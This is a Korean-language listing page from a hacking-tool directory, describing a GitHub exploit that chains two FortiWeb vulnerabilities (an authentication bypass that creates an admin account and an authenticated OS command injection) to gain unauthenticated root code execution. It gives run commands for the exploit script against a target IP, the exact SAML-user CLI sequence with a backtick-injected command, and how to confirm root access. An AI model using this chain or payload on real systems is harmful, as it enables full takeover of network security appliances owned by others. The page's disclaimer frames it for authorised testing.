Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-64446_CVE-2025-58034 — CVE-2025-64446 + CVE-2025-58034 체인을 통한 FortiWeb 원격 코드 실행(RCE) 익스플로잇 | Kitploit
도구/GitHubGitHub/lincemorado97/cve-2025-64446_cve-2025-58034
Authentication & AuthorizationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlLearning & EducationRed Teaming

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
GitHub
lincemorado97/cve-2025-64446_cve-2025-58034

CVE-2025-64446_CVE-2025-58034

CVE-2025-64446 + CVE-2025-58034 체인을 통한 FortiWeb 원격 코드 실행(RCE) 익스플로잇

저장소 보기
1459개월 전아직 검토되지 않음

CVE-2025-64446 + CVE-2025-58034 체인을 통한 FortiWeb 원격 코드 실행(RCE) 익스플로잇

설명

이 스크립트는 Fortinet FortiWeb의 두 가지 치명적인 취약점을 연쇄적으로 활용하여 인증 없이 루트 권한으로 원격 코드 실행을 달성합니다:

  1. CVE-2025-64446 – 상대 경로 순회를 통한 인증 우회
    인증되지 않은 공격자가 인증을 우회하고 새로운 관리 계정을 생성할 수 있습니다.

  2. CVE-2025-58034 – 인증된 OS 명령어 주입
    인증된 공격자(1단계에서 생성된 계정 사용)가 조작된 HTTP 요청을 통해 루트 권한으로 임의의 OS 명령어를 실행할 수 있습니다.

이 두 취약점을 결합함으로써, 공격자는 사전 자격 증명 없이 제로 액세스 상태에서 전체 시스템 장악까지 도달할 수 있습니다.

최종 영향: 인증 없는 원격 코드 실행(루트 셸과 동등)

취약점 세부 정보

CVE-2025-64446 – 인증 우회(상대 경로 순회)

  • 유형: 인증 우회로 이어지는 상대 경로 순회
  • 심각도: 치명적(CVSS 3.1 기본 점수: 9.8)
  • CVSS 벡터: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • 영향을 받는 버전:
    • FortiWeb 8.0.0 – 8.0.1
    • FortiWeb 7.6.0 – 7.6.4
    • FortiWeb 7.4.0 – 7.4.9
    • FortiWeb 7.2.0 – 7.2.11
    • FortiWeb 7.0.0 – 7.0.11

CVE-2025-58034 – 인증된 OS 명령어 주입

  • CVE: CVE-2025-58034
  • 유형: OS 명령어에 사용되는 특수 요소의 부적절한 중화(OS 명령어 주입) – [CWE-78]
  • 심각도: 치명적
  • 설명:
    인증된 공격자는 특수하게 조작된 HTTP 요청 또는 CLI 명령을 통해 기본 시스템에서 임의의 운영 체제 명령을 실행할 수 있습니다.
  • 영향을 받는 버전(이 CVE로 확장됨):
    • FortiWeb 8.0.0 – 8.0.1
    • FortiWeb 7.6.0 – 7.6.5 (참고: 7.6.5 포함)
    • FortiWeb 7.4.0 – 7.4.10 (참고: 7.4.10 포함)
    • FortiWeb 7.2.0 – 7.2.11
    • FortiWeb 7.0.0 – 7.0.11

결합된 공격 체인:

  1. CVE-2025-64446 사용 → 관리자 계정 생성(인증 없이)
  2. 새로 생성된 관리자 계정으로 로그인
  3. CVE-2025-58034 사용 → 루트 권한으로 임의의 OS 명령 실행

사용법

  1. 저장소 복제:

    root@kitploit:~
    git clone https://github.com/lincemorado97/CVE-2025-64446_CVE-2025-58034
    cd CVE-2025-64446_CVE-2025-58034
    
  2. 의존성 설치:

    root@kitploit:~
    pip install -r requirements.txt
    
  3. 전체 익스플로잇 실행(관리자 생성 + 명령 실행):

    root@kitploit:~
    python exploit.py <target_ip> [-u <username>] [-p <password>]
    
    • <target_ip>: 취약한 FortiWeb 장비의 IP 주소 또는 호스트 이름입니다. 필수 인수입니다.
    • -u <username>(선택 사항): 생성될 관리 계정의 사용자 지정 사용자 이름을 지정합니다. 제공되지 않으면 UUID가 사용됩니다.
    • -p <password>(선택 사항): 생성될 관리 계정의 사용자 지정 비밀번호를 지정합니다. 제공되지 않으면 사용자 이름이 비밀번호로 사용됩니다.

    예시:

    root@kitploit:~
    python exploit.py 192.168.1.100 -u admin123 -p password456
    

    이는 192.168.1.100 대상 장비에 사용자 이름 "admin123"과 비밀번호 "password456"으로 관리 계정을 생성하려고 시도합니다.

    사용자 이름과 비밀번호를 지정하지 않으면:

    root@kitploit:~
    python exploit.py 192.168.1.100
    

    스크립트는 사용자 이름으로 임의의 UUID를 생성하고 이를 비밀번호로 사용합니다.

데모

1단계: 인증 우회 및 관리자 생성(CVE-2025-64446)

exploit

verification

2단계: 루트 권한 원격 코드 실행(CVE-2025-58034)

새로 생성된 관리 계정으로 성공적으로 로그인한 후, 공격자는 특수하게 제작된 요청을 통해 또는 FortiWeb CLI를 통해 직접 인증된 명령어 주입 취약점을 악용할 수 있습니다.

신뢰할 수 있는 악용 방법 중 하나는 다음 CLI 명령을 사용하는 것입니다(인증 후 FortiWeb 명령줄 인터페이스에서 실행):

root@kitploit:~
config user saml-user

edit "`<YOUR COMMAND>`"

set entityID http://foo

set service-path /foo

set enforce-signing disable

set slo-bind post

set slo-path /foo

set sso-bind post

set sso-path /foo

end

root-shell rce-demo

검증

실행 후:

  • 명령 결과가 출력에 나타나는지 확인합니다(예: uid=0(root) gid=0(root)는 루트 RCE를 확인함)
  • 생성된 자격 증명으로 SSH(키를 추가한 경우) 또는 웹 인터페이스를 통해 로그인합니다

참고 자료

  • CVE-2025-64446 – https://nvd.nist.gov/vuln/detail/CVE-2025-64446
  • CVE-2025-58034 – https://nvd.nist.gov/vuln/detail/CVE-2025-58034
  • Fortinet PSIRT 권고: https://www.fortinet.com/support/psirt
  • 분석: https://attackerkb.com/topics/zClpINmLCh/cve-2025-58034/rapid7-analysis

면책 조항: 이 도구는 승인된 보안 테스트 및 교육 목적으로만 제공됩니다. 소유하지 않았거나 명시적 테스트 허가를 받지 않은 시스템에 대한 무단 사용은 불법입니다.

도구 다운로드